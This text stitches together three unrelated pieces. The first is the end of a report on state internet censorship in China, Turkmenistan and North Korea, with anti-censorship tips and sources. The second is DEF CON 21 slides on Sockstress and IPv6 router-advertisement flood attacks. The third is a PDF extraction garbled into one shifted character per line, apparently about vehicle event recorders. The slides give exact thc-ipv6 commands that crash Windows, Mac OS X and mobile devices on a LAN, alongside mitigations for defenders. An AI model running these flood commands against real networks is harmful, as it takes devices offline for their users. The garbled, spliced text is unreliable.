equipment in Cuba without government authorization is illegal, there is also a black market for
computer parts, and prices are said to be “extremely” high.
# 03 China
The People’s Republic of China (PRC) possesses the world's most sophisticated Internet
surveillance system. It is variously described as ubiquitous, mature, dynamic, precise, and
effective. Beijing employs an army of public and private cyber security personnel, has a massive
legal support system behind it, and can rely on numerous layers of policy and technical control
mechanisms in order to keep a close eye on its population. However, due to a relatively freer
economic system than some other countries in this list, the Middle Kingdom only registers on the
Exodus Cyber Top Ten at #3.
While comprehensive laws support government control of traditional media and the Internet,
individual privacy statutes are unclear, in short supply, and perhaps even inapplicable in terms of
the information space. However, it must be said that in Asia, it is generally accepted that there is
less privacy in one’s daily life, and the general populace is more comfortable with government
oversight than in the West.
The PRC not only has strict controls on access to the World Wide Web, but there are policemen
stationed at cyber cafés, and there is a Chinese “Great Firewall” designed specifically to prevent
the free flow of information into and out of the country, including, for example, the passing of
videos of Chinese prison and factory conditions to human rights groups abroad. By way of
example, cyber cafés are one of the primary ways that Chinese citizens to access the Internet; the
cafés are required to track their patrons’ usage for 60 days.
The “Great Firewall” of China has been credited with providing the country with highly
sophisticated censorship. Among the types of information known to be blocked are in politics,
religion, and pornography. Activist testing revealed that search results came up short on Taiwan,
Tibet, Falun Gong, Dalai Lama, and Tiananmen Square. In the past, Google and the BBC have
both been blocked wholesale. Interestingly, sites that are often accessible are major American
media sites, human rights groups’ pages, and anonymizers. It is believed that search results are
blocked by keyword at national gateway, and not by Chinese search engines themselves.
Western companies, for their part, have been accused of too much cooperation with the
government in Beijing on cyber control issues. Google, Yahoo, and Microsoft have all
collaborated with the Communist government in prosecutions. At least one U.S. congressman
has termed such cooperation “sickening and evil”, and compared it to the work IBM did for the
Nazi government during World War II.
China is now on the cutting edge of world research and development on Internet technologies.
Exodus worries, however, that Beijing’s emphasis many these – to include IPv6 – is primarily as
a strategy for population control. PRC Internet Society chairwoman Hu Qiheng has stated flatly
that static China’s goal is for the Chinese Internet to achieve a state of “no anonymity”.
The level of sophistication in Chinese Internet surveillance can be seen by the fact that some
URLs were reportedly blocked even while their corresponding top level domains (TLD) were
accessible, even when webpage content appeared consistent across the domain. In other words,
the system is likely not being run solely by machines, but by human personnel as well. Further, it
was reported that blog entries have not only been denied, but some of them may even have been
edited, and reposted to the Web!
In March, 2007, China announced that its Great Firewall had been insufficient to keep out the
Mongol invaders from cyberspace. President Hu Jintao called for a “purification” of the Internet,
and indicated that Beijing would seek to tighten its control over computer networks. According
to Hu, new technologies such as blogging and webcasting have allowed Chinese citizens to
escape government censorship. Among the cited detrimental effects of the evasion are the
“development of socialist culture”, the “security of information”, and the “stability of the state”.
Among the forthcoming initiatives was an announcement that no new cyber cafés would open in
China this year.
# 02 Turkmenistan
President-for-Life Saparmurat Niyazov – the Turkmenbashi, or the Father of All – recently and
unexpectedly passed away. While the country is now in a hopeful state of transition, the
personality cult that Niyazov left behind has Turkmen citizens in a deep hole from which it may
be difficult to escape. There is no independent press, and until recently everything written for
television, newspaper, and radio was some type of hymn or tribute to Niyazov.
Telecommunications in Turkmenistan remains woefully underdeveloped. The Turkmentelekom
monopoly has allowed almost no Internet access into the country whatsoever. No connections
from home, and no cyber cafés. Foreign embassies and non-governmental organizations have
their own access to the Internet. While they have in the past offered access to ordinary Turkmen,
to take advantage of that offer was too dangerous for the average citizen. There exist only a
handful of approved websites to a few Turkmen organizations. In 2001, a count of IT-qualified
certifications in the former Soviet Union placed Turkmenistan dead last, with only fifty-eight in
total.
In 2005, CIA reported that there were only 36,000 Internet users, out of a population of 5 million.
In 2006, a Turkmen journalist who had dared to work with Radio Free Europe died quickly in
prison, only three months after being jailed. Despite repeated European Union (EU) demands,
there has been no investigation into the incident.
Following the demise of the Turkmenbashi, elections were held in February, 2007. Gurbanguli
Berdymukhamedov won a tightly controlled vote, unmonitored by international observers. One
of his campaign promises was that there would be unrestricted access to the Internet.
Days after the new leader was sworn in, 2 cyber cafés opened in Ashgabat. Each is equipped
with 5 computers, 5 desks, and 5 chairs. One is in the Soviet-style Central Telegraph building,
the other in a run-down telephone exchange. The café administrator, Jenet Khudaikulieva, told a
visiting AP journalist at the Grand Opening that censorship in Turkmenistan was over. The
journalist had no problem viewing international news sites, including those belonging to
Turkmen political opposition groups. He reported no registration counter and no “visible”
oversight. However, the price per hour, $4, is a lot to pay in a country where the average
monthly income is less than $100. Indeed, almost no one attended the Grand Opening ceremony.
Life will hopefully take a turn for the better in Turkmenistan. On the bright side, reports suggest
that even though connections to the Internet have been few and far between, computer gaming
appears quite popular. Lastly, the use of satellite TV is on the rise, which could also be used to
improve Internet connectivity.
# 01 North Korea
The closest thing on Earth to George Orwell’s 1984 is the Democratic People’s Republic of
Korea (DPRK). NASA currently has better connectivity with Mars than the rest of planet Earth
has with North Korea, the world's most isolated and repressed country.
Citizens are taught, however, that North Korea is superior to all other countries; therefore, the
perceived threat to the nation-state from unrestricted access to the Internet is extraordinarily high.
Traditional media, including both television and radio, consist of state channels only.
Reminiscent of the life of Winston Smith, the DPRK has a “national intercom” cable/radio station
wired throughout the country. It is a significant source of information for the average North
Korean citizen, offering both news and commentary, and like the two-way telescreens of 1984 is
wired into residences and workplaces throughout the country.
Computers are unavailable in the DPRK. Even if there were, the price would certainly be out of
reach in a country where wild animals – and even tree bark – are scare because the citizens are so
poor and hungry.
Still, Kim Jong-il, Dear Leader of the DPRK, is reported to be fascinated with the IT revolution.
In 2000, he gave the visiting U.S. Secretary of State Madeleine Albright his personal email
address. Still, it is currently thought that only a small circle of North Korean leadership would
have unfiltered Internet access.
North Korea does have an IT school. Every year, one hundred male students, who matriculate as
young as 8 years old, are chosen to attend the Kumsong computer school, where they study
computer programming and English. They are not permitted to play games, or to access the
Internet, but they are allowed to Instant Message each other within the school. A visiting
Western journalist reported the use of Taiwanese hardware and Microsoft software.
According to the South Korean Chief of Military Intelligence, top graduates from the Kim Il-
Sung Military Academy have been chosen for an elite, state-sponsored hacker unit. Allegedly,
they have been instructed to develop “cyber-terror” military options on direct orders from Kim
Jong-Il. Broadly speaking, DRPK intelligence collection is said to be fairly sophisticated, with a
clear collection focus on South Korea, the U.S., and Japan.
Internet connections from North Korea back to Earth are channeled via Moscow and Beijing
through the Korea Computer Centre (KCC), established in 1990. The KCC provides the
government in Pyongyang with its international pipe, and serves as its IT hub. Reports suggest
that it downloads an officially approved, limited amount of research and development
information, and pushes it to a very short list of clients.
The government’s official stance on Internet connectivity is that it cannot tolerate an influx of
“spiritual pollution” into the country. However, the DRPK has been caught operating a state-run
“cyber casino” on a South Korean IP address. Since that discovery, South Korean companies
have been under orders not to register North Korean sites without government approval.
Notes from the Underground
Cyber Control
Technology moves far faster than any government bureaucracy. The Internet changes every
second. We post our messages on dozens of new websites every day, and push the addresses out
before the government can block them. By the time they censor us, we are no longer there.
While Big Brother may prevent some basic cyber attacks, they never even see the clever ones.
Underground sources are now providing us with computer software that will bring this
government to its knees.
The Internet, just like a living organism, needs air to breathe. It thrives based only on the
open exchange of information. The most likely thing about the future is that it will be ever
more wired. Our challenge is to turn better communication into more power for the common
man. Human rights battles will continue to be waged in the future, but time is on our side.
If the government continues to strangle the development of the Internet in our country, the
end result will be death to the economy, and then death to the state. Either way, we win.
Cyber Resistance
The Internet has done more for the cause of freedom than any technology in history, for both
activists and for ordinary citizens. Traditional media pale in comparison, as the printing
press and radio are much more susceptible to government control.
However, we still have much to fear. The reports from Minsk are not encouraging. There are
no magic bullets, only hard work ahead. Even under our new government, the rights of the
people to live in privacy and peace will have to be balanced with legitimate law
enforcement powers. As an immediate goal, negotiations should push for transparency. The
government must explain everything it is doing, and why.
Retain a high degree of skepticism regarding everything you see on the Internet. Increase
vigilance at key times such as elections. Truth is hard enough to find in the real world. In
cyberspace, it is ten times harder. Cyber proof may require that you already know the
answer to the question you are asking, or that you verify what you find from second source.
A freedom fighter, a terrorist, and a government agent walk into an Internet chat room.
Which of them emerges alive? The only way to know for sure is to arrange a meeting in real
life!
Resistance Tools
If I tried to offer you one specific cyber solution, the government would subvert it and use it
against us. Revolutionary corps cadres are studying dozens of strategies to provide us with
both information and anonymity. Here are some of the basic tools:
~ Direct access to foreign ISPs
~ Telephone, Web, Satellite
~ Anonymous email correspondence
~ Remailers, RSS Mailer
~ Anonymous Web browsing
~ P2P, Proxy servers, Encryption
~ Dead drops in cyberspace
~ Saving information at a prearranged location
~ Steganography
~ Hiding truth among the lies
~ Covert channels
~ Normal activity at unusual times
~ Common hacker tools
~ Cyber magic in a box
~ Out of the box thinking
~ Saving text as pictures
New tools are frequently released. A recent program called Psiphon is specifically designed for
information gathering in countries like ours. It is easy to use, and should be difficult for
governments to discover. Here is how it works: a computer user in a free country installs
Psiphon on his computer, then passes a comrade in a country like ours connection
information, including a username and password, usually by telephone or posted mail. The
censored user can then open an encrypted connection through the first user’s computer to the
Internet. This type of communication is difficult for the government both to target and to
decipher.
No single strategy or tool will provide us a perfect solution, because the Internet will never
behave exactly as anyone, including the government, would like. One final warning: if you
feel that you are personally being targeted by Big Brother, lay low. You may already be in a
position where very little can help you.
The Future
Our understanding of world affairs and human rights is growing dramatically, especially in the
Internet era. In the future, hopefully it will be impossible to enslave or even to fool millions of
people. The Internet may be our ticket out of here, so we must try to master it.
Big Brother has many advantages over the people, in brute force and in technology. His tools are
everywhere, and they are more precise than ours. Still, the government is also constrained by the
limits of technology, which are considerable.
Always be suspicious of Internet outages. Try to understand whether the government is targeting
the population as a whole, or you personally. Is the information you seek known to the
government? Are there key words that spies could find? You will have to answer the most
important question for yourself: does the information you seek not exist, or was the government
keeping it from you?
EG
Informants
"2002 Global IT IQ Report", Brainbench, March 2002, www.brainbench.com/pdf/globalitiq.pdf
"Amnesty International concerned at increasing censorship in Iran", Payvand, 12/7/06,
http://www.payvand.com/news/06/dec/1067.html
Anonymous, "Cuba inches into the Internet Age", The Los Angeles Times, November 19, 2006,
http://www.latimes.com/technology/la-fg-cubanet19nov19,1,2828501.story?coll=la-headlines-technology
Beer, Stan. "Iran an enemy of YouTube", Wednesday, 06 December 2006, ITWire,
http://www.itwire.com.au/content/view/7795/53/
"Belarus KGB arrests U.S. Internet specialist", Reuters, October 19, 2004, http://news.zdnet.com/2100-3513_22-
5417399.html
Boghrati, Niusha. "Information Crackdown", Worldpress.org, October 26, 2006,
http://www.worldpress.org/Mideast/2536.cfm
"China keeps largest number of scribes in jail", Associated Press, 12/10/2006,
http://www.thepeninsulaqatar.com/Display_news.asp?section=World_News&subsection=Rest+of+the+World&month=
December2006&file=World_News20061210151736.xml
"A crack in the isolation of Turkmenistan: Internet cafes", USA Today (AP), 2/16/2007,
http://www.usatoday.com/news/world/2007-02-16-turkmenistan_x.htm
"DansGuardian: true web content filtering for all", http://dansguardian.org
Edelman, Ben. "On a Filtered Internet, Things Are Not As They Seem", Reporters Without Borders,
http://www.rsf.org/article.php3?id_article=10761
EURSOC Two. "Iran Running Scared Of The Net", 04 December, 2006,
http://eursoc.com/news/fullstory.php/aid/1260/Iran_Running_Scared_Of_The_Net.html
Fifield, Anna. "N Korea’s computer hackers target South and US", Financial Times, 10/4/2004,
http://www.ft.com/cms/s/3d592eb4-15f0-11d9-b835-00000e2511c8.html
Geers, Kenneth. “Sex. Lies, and Cyberspace: Behind Saudi Arabia's National Firewall”, GSEC Version 1.4, 2003,
http://www.giac.org/certified_professionals/practicals/gsec/2259.php
“The Internet and Elections: The 2006 Presidential Election in Belarus (and its implications)”, OpenNet Initiative:
Internet Watch, April 2006
"Internet Filtering in Burma in 2005: A Country Study", OpenNet Initiative, October 2005,
http://www.opennetinitiative.net/burma
“Internet Filtering in China 2004-2005: A Country Study”, The OpenNet Initiative, April 14, 2005
"Internet Filtering in Iran in 2004-2005", OpenNet Initiative, www.opennetinitiative.net/iran
"Internet fuels rise in number of jailed journalists", Committee to Protect Journalists, Special Report 2006,
http://www.cpj.org/Briefings/2006/imprisoned_06/imprisoned_06.html
"Internet-based SMS blocked for Iran's elections", IranMania, December 04, 2006,
http://www.iranmania.com/News/ArticleView/Default.asp?NewsCode=47753&NewsKind=Current%20Affairs
"Iran blocks YouTube, Wikipedia and NYT", The Bangkok Post, Dec 6, 2006,
http://www.bangkokpost.com/breaking_news/breakingnews.php?id=114803
Karmanau, Yuras. "U.S. citizen arrested by Belarusian KGB", Associated Press, October 19, 2004,
http://www.signonsandiego.com/news/world/20041019-0455-belarus-us-arrest.html
Kennicott, Philip. "With Simple Tools, Activists in Belarus Build a Movement", Washington Post, September 23, 2005,
http://www.washingtonpost.com/wp-dyn/content/article/2005/09/22/AR2005092202012_pf.html
Last, Alex. "Eritrea goes slowly online", BBC News, 14 November, 2000,
http://news.bbc.co.uk/2/hi/africa/1023445.stm
Lobe, Jim. "RIGHTS GROUPS CONDEMN IRAN’S INTERNET CRACKDOWN", Eurasianet, 11/16/04,
http://www.eurasianet.org/departments/civilsociety/articles/eav111604.shtml
LonghornFreeper. "North Korean military hackers unleash "cyber-terror" on South Korean computers", Free Republic,
05/27/2004, http://www.freerepublic.com/focus/f-news/1143440/posts
Magee, Zoe. "Iran's Internet Crackdown", ABC News, Dec. 6, 2006,
http://abcnews.go.com/International/print?id=2704399
Manyukwe, Clemence. "Zimbabwe: Paranoia Grips Govt", OPINION, Zimbabwe Independent (Harare), November 10,
2006 http://allafrica.com/stories/200611100389.html
"Media warfare in the Horn of Africa", BBC Online Network, March 2, 1999,
http://news.bbc.co.uk/2/hi/world/monitoring/280680.stm
Mite, Valentinas. "Belarus: Opposition Politicians Embrace Internet, Despite Digital Divide", Radio Free Europe/Radio
Liberty (Bymedia.net), February 7, 2006, http://www.rferl.org/featuresarticle/2006/2/94d60147-0a69-4f28-86c3-
728a651fb0d0.html?napage=2
"Mugabe's spies to infiltrate internet cafés", AFRICAST: Global Africa Network, SOUTHERN REGION NEWS, 12/04/06
http://news.africast.com/africastv/article.php?newsID=60327
"New Belarus Bill Restricts Online Dating", ABC News,
http://abcnews.go.com/Technology/wireStory?id=1412972&CMP=OTC-RSSFeeds0312
New Software to Fight Web Censorship, The Irawaddy, Friday, December 01, 2006,
http://www.irrawaddy.org/aviewer.asp?a=6443&z=148
Nichols, Michelle. "Jailed journalists worldwide hits record", New Zealand Herald, December 8, 2006,
http://www.nzherald.co.nz/section/story.cfm?c_id=2&ObjectID=10414439
"North Korea nurturing nerds", The Sydney Morning Herald, 10/21/2005,
http://www.smh.com.au/articles/2005/10/20/1129775892093.html
O'Brien, Danny. "A Code of Conduct for Internet Companies in Authoritarian Regimes", Electronic Frontier Foundation,
February 15, 2006, http://www.eff.org/deeplinks/archives/004410.php
Perkel, Colin. "Canadian software touted as answer to Internet censorship abroad", Canoe, 2006-12-01,
http://money.canoe.ca/News/Sectors/Technology/2006/11/30/2561763-cp.html
Peta, Basildon. "Brainwashing camp awaits Harare journalists", November 29, 2006, Independent Online,
http://www.iol.co.za/index.php?set_id=1&click_id=84&art_id=vn20061129022721568C138622
"Press Freedom Round-up 2006", Reporters Without Borders, 31 December 2006,
http://www.rsf.org/article.php3?id_article=20286
Rena, Ravinder. "Information Technology and Development in Africa: The Case of Eritrea", November 26, 2006,
http://www.worldpress.org/Africa/2578.cfm
Reyes, Nancy. "First they censored the letters, then the internet, and now, cellphones", November 28th, 2006,
http://www.bloggernews.net/12537
Slavin, Barbara. "Internet boom alters political process in Iran", USA TODAY, 6/12/2005,
http://www.usatoday.com/news/world/2005-06-12-iran-election-internet_x.htm
"South Korea probes North Korea's cyber-casino", TechCentral, 1/14/2004, Computer Crime Research Center,
http://www.crime-research.org/news/2004/01/Mess1401.html (original: The Star Online (Malaysia), http://star-
techcentral.com/tech/story.asp?file=/2004/1/14/technology/7106580&sec=technology)
Sprinkle, Timothy. "Press Freedom Group Tests Cuban Internet Surveillance", World Politics Watch, 08 Nov 2006,
http://worldpoliticswatch.com/article.aspx?id=321
Thomas, Luke. "Iran Online: The mullahs can’t keep their people from the world", March 02, 2004,
http://www.nationalreview.com/comment/thomas200403021100.asp
"Turkmenistan", Reporters Without Borders, http://www.rsf.org/article.php3?id_article=10684
Usher, Sebastian. "Belarus protesters turn to internet", BBC, 21 March 2006,
http://news.bbc.co.uk/2/low/europe/4828848.stm
Usher, Sebastian. "Belarus stifles critical media", BBC, 17 March 2006,
http://news.bbc.co.uk/2/low/europe/4818050.stm
Voeux, Claire and Pain, Julien. "Going Online in Cuba - Internet under surveillance", Reporters Without Borders,
October 2006, http://www.rsf.org/article.php3?id_article=19335
Zimbabwe, Amnesty International, http://www.amnesty.ca/zimbabwe/
"Zimbabwe: Revised Bill Still Threatens Rights of Access to Information And Free Expression", Media Institute of
Southern Africa (Windhoek)", PRESS RELEASE, December 1, 2006, http://allafrica.com/stories/200612010376.html | pdf |
Evil
DoS
A*acks
and
Strong
Defenses
Sam
Bowne
and
Ma*hew
Prince
DEF
CON
21
August
2,
2013
Bio
Bio
Evil
A*acks
Sockstress
New
IPv6
RA
Flood
Sockstress
TCP
Handshake
Images
from
drawingstep.com
and
us.123rf.com
Client
Server
TCP
Window
Size
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Port | Destination Port |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Sequence Number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Acknowledgment Number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Data | |U|A|P|R|S|F| |
| Offset| Reserved |R|C|S|S|Y|I| Window |
| | |G|K|H|T|N|N| |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Checksum | Urgent Pointer |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Options | Padding |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| data |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
TCP Header Format
Sockstress
A*ack
Images
from
drawingstep.com
and
us.123rf.com
Client
Server
From
2008
• SPll
not
patched
• A*acks
TCP
by
sending
a
small
WINDOW
size
• Causes
sessions
to
hang
up,
consuming
RAM
• Can
render
servers
unbootable
Sockstress
Demo
MiPgaPon
• Short-‐term
– Block
packets
with
small
window
sizes
with
a
firewall
• Long-‐term
– PATCH
OS
to
reclaim
RAM
– It’s
been
5
years,
guys!
IPv4
ExhausPon
IPv4
ExhausPon
One
Year
Le\
IPv6
ExhausPon
Link-‐Local
DoS
IPv6
Router
AdverPsements
Old
A*ack
(from
2011)
Image
from
forumlane.org
IPv4:
DHCP
PULL
process
n Client
requests
an
IP
n Router
provides
one
Host
Router
I
need
an
IP
Use
this
IP
IPv6:
Router
AdverPsements
PUSH
process
n Router
announces
its
presence
n Every
client
on
the
LAN
creates
an
address
and
joins
the
network
Host
Router
JOIN
MY
NETWORK
Yes,
SIR
Router
AdverPsement
Packet
RA
Flood
(from
2011)
flood_router6
Effects
of
flood_router6
• Drives
Windows
to
100%
CPU
• Also
affects
FreeBSD
• No
effect
on
Mac
OS
X
or
Ubuntu
Linux
The
New
RA
Flood
Image
from
guntech.com/
MORE
IS
BETTER
• Each
RA
now
contains
– 17
Route
InformaPon
secPons
– 18
Prefix
InformaPon
secPons
Flood
Does
Not
Work
Alone
• Before
the
flood,
you
must
send
some
normal
RA
packets
• This
puts
Windows
into
a
vulnerable
state
– Thanks
to
var_x
for
noPcing
this
in
my
lab
at
CCSF
How
to
Perform
this
A*ack
• For
best
results,
use
a
gigabit
Ethernet
NIC
on
a*acker
and
a
gigabit
switch
• Use
thc-‐ipv6
2.1
on
Linux
• Three
Terminal
windows:
1. ./fake_router6
eth1
a::/64
2. ./fake_router6
eth1
b::/64
3. ./flood_router26
eth1
• Windows
dies
within
30
seconds
Effects
of
New
RA
Flood
• Win
8
&
Server
2012
die
(BSOD)
• Microso\
Surface
RT
dies
(BSOD)
• Mac
OS
X
dies
• Win
7
&
Server
2008
R2,
with
the
"IPv6
Readiness
Update"
freeze
during
a*ack
• iPad
3
slows
and
somePmes
crashes
• Android
phone
slows
and
somePmes
crashes
• Ubuntu
Linux
suffers
no
harm
Videos
and
Details
MiPgaPon
• Disable
IPv6
• Turn
off
Router
Discovery
with
netsh
• Use
a
firewall
to
block
rogue
RAs
• Get
a
switch
with
RA
Guard
• Microso\'s
"IPv6
Readiness
Update"
provides
some
protecPon
for
Win
7
&
Server
2008
R2
– Released
Nov.
13,
2012
– KB
2750841
– But
NOT
for
Win
8
or
Server
2012!!
DEMO
More
Info
• Slides,
instrucPons
for
the
a*acks,
&
more
at
• Samsclass.info | pdf |
!
"
#
$
%
&
'
(
(
#
%
)
%
*
*
+
,
-
.
/
0
1
.
2
,
3
-
0
/
0
4
5
2
.
6
7
0
8
-
,
5
8
,
7
0
8
6
5
1
.
9
,
4
2
.
,
/
0
3
8
-
0
:
.
2
.
7
-
9
0
8
5
7
.
;
3
5
<
=
/
.
8
-
7
0
/
<
,
9
.
1
>
5
-
?
@
.
?
5
7
2
.
6
5
8
-
?
.
<
,
6
-
A
B
2
-
?
0
3
C
?
6
0
/
.
0
:
-
?
.
6
.
.
2
.
7
-
9
0
8
5
7
1
.
@
5
7
.
6
,
9
.
3
6
.
9
@
5
6
5
4
2
.
,
<
<
2
5
,
8
7
.
6
D
6
3
7
?
,
6
.
8
-
.
9
-
,
5
8
/
.
8
-
,
8
1
8
,
@
5
C
,
-
5
0
8
6
E
6
=
-
.
/
6
D
/
,
8
E
,
9
.
1
.
@
5
7
.
6
3
8
1
.
9
-
?
.
?
0
0
1
5
8
7
2
3
1
5
8
C
7
0
8
-
9
0
2
2
.
9
6
:
0
9
:
3
.
2
5
8
F
.
7
-
5
0
8
D
,
8
-
5
=
2
0
7
G
4
9
,
G
.
6
D
,
8
1
,
5
9
4
,
C
6
A
H
?
.
8
3
/
4
.
9
0
:
1
.
@
5
7
.
6
3
6
.
1
D
,
6
>
.
2
2
,
6
-
?
.
6
0
=
<
?
5
6
-
5
7
,
-
5
0
8
D
@
.
9
6
,
-
5
2
5
-
E
D
,
8
1
<
9
0
C
9
,
/
/
,
4
5
2
5
-
E
0
:
-
?
.
1
.
@
5
7
.
6
5
6
7
0
8
-
5
8
3
,
2
2
E
5
8
=
7
9
.
,
6
5
8
C
A
I
0
-
6
3
9
<
9
5
6
5
8
C
2
E
D
-
?
.
6
.
1
.
@
5
7
.
6
,
9
.
,
2
6
0
8
.
-
>
0
9
G
.
1
D
,
2
2
0
>
5
8
C
-
?
.
/
-
0
7
0
/
/
3
8
5
7
,
-
.
>
5
-
?
.
,
7
?
0
-
?
.
9
,
8
1
>
5
-
?
,
1
1
5
-
5
0
8
,
2
.
;
3
5
<
/
.
8
-
0
3
-
6
5
1
.
-
?
.
@
.
?
5
7
2
.
:
0
9
1
5
,
C
8
0
6
-
5
7
6
,
8
1
7
0
8
J
C
3
9
,
-
5
0
8
A
B
3
-
0
/
0
-
5
@
.
.
2
.
7
-
9
0
8
5
7
1
.
@
5
7
.
6
.
8
,
4
2
.
-
?
.
2
0
C
C
5
8
C
0
:
@
.
?
5
7
2
.
6
.
8
6
0
9
1
,
-
,
D
<
,
9
=
-
5
7
3
2
,
9
2
E
5
8
-
?
.
.
@
.
8
-
0
:
,
8
,
7
7
5
1
.
8
-
0
9
,
8
.
,
9
/
5
6
6
A
+
5
-
-
2
.
5
8
:
0
9
/
,
-
5
0
8
,
4
0
3
-
-
?
.
6
.
2
0
C
C
5
8
C
1
.
@
5
7
.
6
5
6
9
.
,
1
5
2
E
,
@
,
5
2
,
4
2
.
D
4
.
7
,
3
6
.
-
?
0
6
.
>
5
-
?
-
?
.
5
8
:
0
9
/
,
-
5
0
8
K
@
.
?
5
7
2
.
,
8
1
,
:
-
.
9
/
,
9
G
.
-
-
0
0
2
/
,
8
3
:
,
7
-
3
9
.
9
6
L
,
9
.
/
,
G
5
8
C
,
8
.
M
0
9
-
-
0
G
.
.
<
-
?
.
5
8
:
0
9
/
,
-
5
0
8
1
5
N
7
3
2
-
:
0
9
-
?
.
<
3
4
2
5
7
-
0
0
4
-
,
5
8
A
KO
>
,
6
<
.
9
6
0
8
,
2
2
E
1
.
8
5
.
1
/
.
/
4
.
9
=
6
?
5
<
5
8
-
?
.
0
8
2
E
1
5
6
7
3
6
6
5
0
8
C
9
0
3
<
O
,
/
,
>
,
9
.
0
:
0
8
-
?
5
6
6
3
4
F
.
7
-
4
.
7
,
3
6
.
O
,
/
8
0
-
2
,
>
.
8
:
0
9
7
.
/
.
8
-
D
O
1
0
8
0
-
0
>
8
,
P
Q
R
S
S
-
0
0
2
:
0
9
1
0
>
8
2
0
,
1
5
8
C
-
?
5
6
5
8
:
0
9
/
,
-
5
0
8
D
,
8
1
O
>
,
6
8
0
-
8
0
/
5
8
,
-
.
1
4
E
/
.
/
4
.
9
6
0
:
-
?
.
C
9
0
3
<
A
L
H
?
.
<
9
5
/
,
9
E
5
8
-
.
9
.
6
-
5
8
-
?
5
6
5
8
:
0
9
/
,
-
5
0
8
5
6
2
,
>
.
8
:
0
9
7
.
/
.
8
-
:
0
9
:
0
9
.
8
6
5
7
,
8
,
2
E
6
5
6
0
:
,
8
,
7
7
5
1
.
8
-
6
7
.
8
.
A
T
5
8
7
.
:
.
>
9
.
,
2
5
U
.
-
?
,
-
-
?
5
6
5
8
:
0
9
/
,
-
5
0
8
5
6
9
.
7
0
9
1
.
1
D
,
8
0
N
7
.
9
7
0
3
2
1
.
,
6
5
2
E
7
0
8
=
8
.
7
-
,
1
.
@
5
7
.
,
8
1
1
0
>
8
2
0
,
1
,
@
.
?
5
7
2
.
V6
7
9
,
6
?
5
8
:
0
9
/
,
-
5
0
8
>
5
-
?
0
3
-
-
?
.
1
9
5
@
.
9
V6
<
.
9
/
5
6
6
5
0
8
0
9
G
8
0
>
2
.
1
C
.
A
H
?
5
6
7
0
3
2
1
4
.
1
0
8
.
.
5
-
?
.
9
,
-
-
?
.
6
7
.
8
.
0
:
,
8
,
7
7
5
1
.
8
-
D
>
?
5
2
.
-
?
.
1
9
5
@
.
9
5
6
1
5
6
-
9
,
7
-
.
1
D
0
9
,
:
-
.
9
>
,
9
1
6
>
?
.
8
-
?
.
@
.
?
5
7
2
.
5
6
,
-
,
9
.
<
,
5
9
6
?
0
<
-
?
,
-
5
6
8
0
-
2
5
G
.
2
E
-
0
4
.
7
0
8
7
.
9
8
.
1
,
4
0
3
-
-
?
.
1
9
5
@
.
9
V6
<
9
5
@
,
7
E
A
H
?
.
8
.
.
1
:
0
9
.
2
.
7
-
9
0
8
5
7
1
.
@
5
7
.
6
0
8
,
8
,
3
-
0
/
0
4
5
2
.
,
9
0
6
.
D
,
-
2
.
,
6
-
5
8
<
,
9
-
K
5
8
-
?
.
W
A
T
AL
D
:
9
0
/
:
.
1
.
9
,
2
2
,
>
A
X
5
-
5
8
C
.
8
@
5
9
0
8
/
.
8
-
,
2
7
0
8
7
.
9
8
6
D
-
?
.
:
.
1
.
9
,
2
C
0
@
=
.
9
8
/
.
8
-
/
,
8
1
,
-
.
1
7
.
9
-
,
5
8
:
3
.
2
.
N
7
5
.
8
7
E
6
-
,
8
1
,
9
1
6
-
?
,
-
8
.
7
.
6
6
5
-
,
-
.
1
.
2
.
7
-
9
0
8
5
7
7
0
8
-
9
0
2
A
H
?
.
J
9
6
-
9
.
C
3
2
,
-
5
0
8
>
,
6
G
8
0
>
8
,
6
Y
8
=
Z
0
,
9
1
[
5
,
C
8
0
6
-
5
7
6
K
Y
Z
[
L
A
Y
Z
[
9
.
;
3
5
9
.
1
,
:
.
>
4
,
6
5
7
6
.
8
6
0
9
6
,
8
1
1
5
,
C
8
0
6
-
5
7
<
9
0
7
.
1
3
9
.
6
D
4
3
-
1
5
1
8
0
-
6
-
,
8
1
,
9
1
5
U
.
-
?
.
5
8
-
.
9
:
,
7
.
A
B
6
-
,
8
1
,
9
1
5
8
-
.
9
:
,
7
.
>
,
6
5
8
-
9
0
1
3
7
.
1
>
5
-
?
Y
8
=
Z
0
,
9
1
[
5
,
C
8
0
6
-
5
7
6
O
O
K
Y
Z
[
Q
5
8
-
?
5
6
,
9
-
5
7
2
.
D
.
2
6
.
>
?
.
9
.
,
4
4
9
.
@
5
,
-
.
1
,
6
Y
Z
[
O
O
0
9
Y
Z
[
O
O
L
A
Y
Z
[
Q
>
,
6
/
,
8
1
,
-
.
1
:
0
9
,
2
2
,
3
-
0
/
0
4
5
2
.
6
6
0
2
1
5
8
-
?
.
W
8
5
-
.
1
T
-
,
-
.
6
:
9
0
/
\
]
]
^
0
8
>
,
9
1
A
H
?
.
/
,
F
0
9
5
-
E
0
:
-
?
.
Y
Z
[
Q
6
<
.
7
5
J
7
,
-
5
0
8
6
>
.
9
.
>
9
5
-
-
.
8
4
E
-
?
.
T
0
7
5
.
-
E
0
:
B
3
-
0
=
/
0
-
5
@
.
_
8
C
5
8
.
.
9
6
K
T
B
_
L
D
>
5
-
?
0
8
.
8
0
-
,
4
2
.
.
`
7
.
<
-
5
0
8
>
9
5
-
-
.
8
4
E
O
T
Y
A
H
?
.
Y
Z
[
Q
6
-
,
8
1
,
9
1
7
0
@
.
9
6
,
2
2
-
?
.
1
.
-
,
